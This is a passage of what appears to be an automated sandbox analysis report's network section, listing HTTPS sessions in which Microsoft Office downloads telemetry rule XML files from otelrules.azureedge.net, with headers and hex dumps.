                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        104192.168.2.44985713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1c14ddc0-c01e-0079-51d5-33e51a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f78459684bddphC1EWRbht400000004t000000000pfu4
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        105192.168.2.44986013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 2f59fc8c-901e-002a-3cd5-337a27000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968l4kp6hC1EWRe88400000005fg0000000018ty
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        106192.168.2.44986313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 41743bdd-f01e-003c-7cd5-338cf0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968swgbqhC1EWRmnb400000005a0000000009c7x
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        107192.168.2.44986213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                        x-ms-request-id: ab1019be-501e-0035-43d5-33c923000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f78459684bddphC1EWRbht400000004yg000000002br9
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        108192.168.2.44986413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7f458887-c01e-008e-47d5-337381000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968n2hr8hC1EWR9cag00000004p000000000s20x
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        109192.168.2.44986513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                        x-ms-request-id: dc8e8528-f01e-0085-10d5-3388ea000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968cdxdrhC1EWRg0en0000000560000000000z7q
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        110192.168.2.44986613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 2302abc5-d01e-0017-53d5-33b035000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968frfdmhC1EWRxxbw000000053g00000000q0dr
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        111192.168.2.44986713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                        x-ms-request-id: b29ecc16-801e-00a3-01d5-337cfb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153711Z-174f7845968nnm4mhC1EWR1rn400000004yg00000000tq73
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        112192.168.2.44986913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 6de6115a-f01e-00aa-46d5-338521000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153711Z-174f7845968cdxdrhC1EWRg0en000000053g00000000a9ry
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
